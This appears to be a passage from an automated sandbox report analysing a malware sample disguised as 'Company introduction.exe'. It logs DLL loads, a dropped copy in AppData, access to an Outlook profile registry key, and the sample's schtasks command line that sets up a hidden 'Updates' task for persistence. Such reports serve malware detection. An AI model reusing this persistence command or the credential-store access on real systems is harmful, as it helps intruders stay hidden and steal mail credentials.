                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\Company introduction.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Company introduction.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Company introduction.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Company introduction.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_017D9C30 push esp; retf 02F1h6_2_017D9D55
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_0294EBFB push ecx; ret 7_2_0294EBFC
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 7_2_06EE72DC pushad ; retf 7_2_06EE72A1
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_01839C30 push esp; retf 0185h12_2_01839D55
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F69241 push es; ret 12_2_06F69244
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F62DBF pushfd ; retf 12_2_06F62DC1
                Source: Company introduction.exeStatic PE information: section name: .text entropy: 7.681146035096391
                Source: FzXKnGk.exe.0.drStatic PE information: section name: .text entropy: 7.681146035096391
                Source: C:\Users\user\Desktop\Company introduction.exeFile created: C:\Users\user\AppData\Roaming\FzXKnGk.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
